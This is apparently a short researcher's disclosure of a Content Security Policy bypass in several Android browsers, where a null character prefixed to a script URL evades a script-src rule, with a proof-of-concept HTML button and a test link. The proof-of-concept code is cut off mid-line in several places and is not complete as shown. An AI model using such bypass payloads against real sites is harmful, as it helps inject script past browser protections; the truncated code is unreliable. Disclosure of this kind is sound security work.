https://cve.mitre.org/cgi-bin/
I've tested this on an Android 4.3 tablet. I've tested this and it works on Firefox (32.0.2), InBrowser, Dolphin (App info doesn't give version). I also tested the default android browser on 4.3.1 emulator which was also vulnerable.
PoC:
<input type=button value="test" onclick="
a=document.createElement('
a.id='AA';
a.src='\u0000https://js.
document.body.appendChild(a);
setTimeout(function(){if(
return false;">
The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v2/ ;
The PoC worked if you see a popup containing stripes e(){} object. You can test this onhttp://ejj.io/test.php
Cheers,
Evan J
Komentarų nėra:
Rašyti komentarą